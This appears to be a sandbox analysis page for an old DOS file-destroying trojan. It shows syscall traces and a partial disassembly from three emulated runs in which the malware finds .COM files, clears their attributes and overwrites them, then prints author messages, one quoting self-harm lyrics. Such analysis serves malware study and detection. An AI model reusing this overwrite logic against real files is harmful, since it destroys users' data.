Sample viewer

vx.netlux.org/Trojan.DOS.KillFiles.z

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:29:13.346473435Z 59 PC: 12a48 | Change current directory
2018-12-17T22:29:13.355584149Z 9 PC: 12a4f | Display string (String= ' Would you look at me now ? Can you tell im a man ? Whith these scars on my wrists To prove i`ll try again... -PanterA, Suicide Note part I ')
2018-12-17T22:29:13.364175078Z 42 PC: 12a54 | Get date
0x12a54: cmp al, 6
0x12a56: je 0x12aa4
0x12a58: jmp 0x12a5b
0x12a5a: nop
0x12a5b: mov ah, 0x4e
0x12a5d: mov dx, 0x320
0x12a60: int 0x21
0x12a62: jb 0x12aae
0x12a64: mov ah, 0x43
0x12a66: mov al, 0
0x12a68: mov dx, 0x9e
0x12a6b: int 0x21
0x12a6d: nop
0x12a6e: mov ah, 0x43
0x12a70: mov al, 1
0x12a72: mov dx, 0x9e
0x12a75: mov cl, 0
0x12a77: int 0x21
0x12a79: nop
0x12a7a: mov ax, 0x3d01
2018-12-17T22:29:13.36694048Z 78 PC: 12a62 | Find first file
2018-12-17T22:29:13.373949691Z 67 PC: 12a6d | Get or set file attributes
2018-12-17T22:29:13.380850669Z 67 PC: 12a79 | Get or set file attributes
2018-12-17T22:29:13.397988654Z 61 PC: 12a82 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:29:13.40603063Z 64 PC: 12a8f | Write file or device (Write 110 bytes on handle 5)
2018-12-17T22:29:13.414010371Z 62 PC: 12a94 | Close file
2018-12-17T22:29:13.423592893Z 79 PC: 12a99 | Find next file
2018-12-17T22:29:13.42689701Z 61 PC: 12a62 | Open file (Filename = 'PRINT.S')
2018-12-17T22:29:13.435244979Z 67 PC: 12a6d | Get or set file attributes
2018-12-17T22:29:13.44198321Z 67 PC: 12a79 | Get or set file attributes
2018-12-17T22:29:13.453150244Z 61 PC: 12a82 | Open file (Filename = 'PRINT.S')
2018-12-17T22:29:13.467604449Z 64 PC: 12a8f | Write file or device (Write 110 bytes on handle 6)
2018-12-17T22:29:13.474951774Z 62 PC: 12a94 | Close file
2018-12-17T22:29:13.483733991Z 79 PC: 12a99 | Find next file
2018-12-17T22:29:13.487055552Z 61 PC: 12a62 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:29:13.494559137Z 67 PC: 12a6d | Get or set file attributes
2018-12-17T22:29:13.50091546Z 67 PC: 12a79 | Get or set file attributes
2018-12-17T22:29:13.511316395Z 61 PC: 12a82 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:29:13.525159426Z 64 PC: 12a8f | Write file or device (Write 110 bytes on handle 7)
2018-12-17T22:29:13.532894312Z 62 PC: 12a94 | Close file
2018-12-17T22:29:13.54202633Z 79 PC: 12a99 | Find next file
2018-12-17T22:29:13.546400171Z 61 PC: 12a62 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:29:13.554033648Z 67 PC: 12a6d | Get or set file attributes
2018-12-17T22:29:13.560656137Z 67 PC: 12a79 | Get or set file attributes
2018-12-17T22:29:13.572308384Z 61 PC: 12a82 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:29:13.585851145Z 64 PC: 12a8f | Write file or device (Write 110 bytes on handle 8)
2018-12-17T22:29:13.594394142Z 62 PC: 12a94 | Close file
2018-12-17T22:29:13.604358288Z 79 PC: 12a99 | Find next file
2018-12-17T22:29:13.607875692Z 61 PC: 12a62 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:29:13.615753626Z 67 PC: 12a6d | Get or set file attributes
2018-12-17T22:29:13.62345131Z 67 PC: 12a79 | Get or set file attributes
2018-12-17T22:29:13.634620528Z 61 PC: 12a82 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:29:13.647823331Z 64 PC: 12a8f | Write file or device (Write 110 bytes on handle 9)
2018-12-17T22:29:13.656875451Z 62 PC: 12a94 | Close file
2018-12-17T22:29:13.666352147Z 79 PC: 12a99 | Find next file
2018-12-17T22:29:13.669676005Z 61 PC: 12a62 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:29:13.678033295Z 67 PC: 12a6d | Get or set file attributes
2018-12-17T22:29:13.684820113Z 67 PC: 12a79 | Get or set file attributes
2018-12-17T22:29:13.696137537Z 61 PC: 12a82 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:29:13.709621898Z 64 PC: 12a8f | Write file or device (Write 110 bytes on handle 10)
2018-12-17T22:29:13.718666482Z 62 PC: 12a94 | Close file
2018-12-17T22:29:13.727459295Z 79 PC: 12a99 | Find next file
2018-12-17T22:29:13.730785177Z 61 PC: 12a62 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:29:13.739264832Z 67 PC: 12a6d | Get or set file attributes
2018-12-17T22:29:13.745699704Z 67 PC: 12a79 | Get or set file attributes
2018-12-17T22:29:13.756799649Z 61 PC: 12a82 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:29:13.770904353Z 64 PC: 12a8f | Write file or device (Write 110 bytes on handle 11)
2018-12-17T22:29:13.779629833Z 62 PC: 12a94 | Close file
2018-12-17T22:29:13.788545026Z 79 PC: 12a99 | Find next file
2018-12-17T22:29:13.792684986Z 61 PC: 12a62 | Open file (Filename = 'PAH.COM')
2018-12-17T22:29:13.800567159Z 67 PC: 12a6d | Get or set file attributes
2018-12-17T22:29:13.807255947Z 67 PC: 12a79 | Get or set file attributes
2018-12-17T22:29:13.818873022Z 61 PC: 12a82 | Open file (Filename = 'PAH.COM')
2018-12-17T22:29:13.83236162Z 64 PC: 12a8f | Write file or device (Write 110 bytes on handle 12)
2018-12-17T22:29:13.840333403Z 62 PC: 12a94 | Close file
2018-12-17T22:29:13.848997416Z 79 PC: 12a99 | Find next file
2018-12-17T22:29:13.852884412Z 61 PC: 12a62 | Open file (Filename = 'TEST.COM')
2018-12-17T22:29:13.862772754Z 67 PC: 12a6d | Get or set file attributes
2018-12-17T22:29:13.869066001Z 67 PC: 12a79 | Get or set file attributes
2018-12-17T22:29:13.88574073Z 61 PC: 12a82 | Open file (Filename = 'TEST.COM')
2018-12-17T22:29:13.923367461Z 64 PC: 12a8f | Write file or device (Write 110 bytes on handle 13)
2018-12-17T22:29:13.931240521Z 62 PC: 12a94 | Close file
2018-12-17T22:29:13.94120817Z 79 PC: 12a99 | Find next file
2018-12-17T22:29:13.944672915Z 25 PC: 12ab2 | Get default drive
2018-12-17T22:29:13.949322314Z 9 PC: 12ac8 | Display string (String= ' A tous mes potes,je vis grace a eux. -18 nov. 2001-vitrolles, France')
2018-12-17T22:29:13.954458082Z 9 PC: 12acf | Display string (String= ' S-note virus by 2STONED (vince), greets 2 Elodie,u r so cool..')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5218,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:54:00.164271501Z 59 PC: 12a48 | Change current directory
2018-12-25T11:54:00.168794366Z 9 PC: 12a4f | Display string (String= ' Would you look at me now ? Can you tell im a man ? Whith these scars on my wrists To prove i`ll try again... -PanterA, Suicide Note part I ')
2018-12-25T11:54:00.175621526Z 42 PC: 12a54 | Get date
0x12a54: cmp al, 6
0x12a56: je 0x12aa4
0x12a58: jmp 0x12a5b
0x12a5a: nop
0x12a5b: mov ah, 0x4e
0x12a5d: mov dx, 0x320
0x12a60: int 0x21
0x12a62: jb 0x12aae
0x12a64: mov ah, 0x43
0x12a66: mov al, 0
0x12a68: mov dx, 0x9e
0x12a6b: int 0x21
0x12a6d: nop
0x12a6e: mov ah, 0x43
0x12a70: mov al, 1
0x12a72: mov dx, 0x9e
0x12a75: mov cl, 0
0x12a77: int 0x21
0x12a79: nop
0x12a7a: mov ax, 0x3d01
2018-12-25T11:54:00.178146051Z 78 PC: 12a62 | Find first file
2018-12-25T11:54:00.186439143Z 67 PC: 12a6d | Get or set file attributes
2018-12-25T11:54:00.197490002Z 67 PC: 12a79 | Get or set file attributes
2018-12-25T11:54:00.201945369Z 61 PC: 12a82 | Open file (Filename = 'As')
2018-12-25T11:54:00.207769829Z 64 PC: 12a8f | Write file or device (Write 1902 bytes on handle 2)
2018-12-25T11:54:00.22983354Z 62 PC: 12a94 | Close file
2018-12-25T11:54:00.231486416Z 79 PC: 12a99 | Find next file
2018-12-25T11:54:00.233759946Z 61 PC: 12a62 | Open file (See above)
2018-12-25T11:54:00.241276932Z 67 PC: 12a6d | Get or set file attributes (See above)
2018-12-25T11:54:00.246752409Z 67 PC: 12a79 | Get or set file attributes (See above)
2018-12-25T11:54:00.714528495Z 61 PC: 12a82 | Open file (See above)
2018-12-25T11:54:00.72686415Z 64 PC: 12a8f | Write file or device (See above)
2018-12-25T11:54:00.733469896Z 62 PC: 12a94 | Close file (See above)
2018-12-25T11:54:00.742401936Z 79 PC: 12a99 | Find next file (See above)
2018-12-25T11:54:00.746208437Z 61 PC: 12a62 | Open file (See above)
2018-12-25T11:54:00.752754738Z 67 PC: 12a6d | Get or set file attributes (See above)
2018-12-25T11:54:00.764271088Z 67 PC: 12a79 | Get or set file attributes (See above)
2018-12-25T11:54:00.776797951Z 61 PC: 12a82 | Open file (See above)
2018-12-25T11:54:00.784850854Z 64 PC: 12a8f | Write file or device (See above)
2018-12-25T11:54:00.81081845Z 62 PC: 12a94 | Close file (See above)
2018-12-25T11:54:00.820080811Z 79 PC: 12a99 | Find next file (See above)
2018-12-25T11:54:00.846852204Z 61 PC: 12a62 | Open file (See above)
2018-12-25T11:54:00.853403468Z 25 PC: 12ab2 | Get default drive
2018-12-25T11:54:00.862400795Z 9 PC: 12ac8 | Display string (String= ' A tous mes potes,je vis grace a eux. -18 nov. 2001-vitrolles, France')
2018-12-25T11:54:00.86834789Z 9 PC: 12acf | Display string (String= ' S-note virus by 2STONED (vince), greets 2 Elodie,u r so cool..')

{"DateBased":true,"Day":5,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5218,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:54:00.226513285Z 59 PC: 12a48 | Change current directory
2018-12-25T11:54:00.230770942Z 9 PC: 12a4f | Display string (String= ' Would you look at me now ? Can you tell im a man ? Whith these scars on my wrists To prove i`ll try again... -PanterA, Suicide Note part I ')
2018-12-25T11:54:00.237428426Z 42 PC: 12a54 | Get date
0x12a54: cmp al, 6
0x12a56: je 0x12aa4
0x12a58: jmp 0x12a5b
0x12a5a: nop
0x12a5b: mov ah, 0x4e
0x12a5d: mov dx, 0x320
0x12a60: int 0x21
0x12a62: jb 0x12aae
0x12a64: mov ah, 0x43
0x12a66: mov al, 0
0x12a68: mov dx, 0x9e
0x12a6b: int 0x21
0x12a6d: nop
0x12a6e: mov ah, 0x43
0x12a70: mov al, 1
0x12a72: mov dx, 0x9e
0x12a75: mov cl, 0
0x12a77: int 0x21
0x12a79: nop
0x12a7a: mov ax, 0x3d01
2018-12-25T11:54:00.239316512Z 9 PC: 12aab | Display string (String= ' c bon pour cette fois ci ...')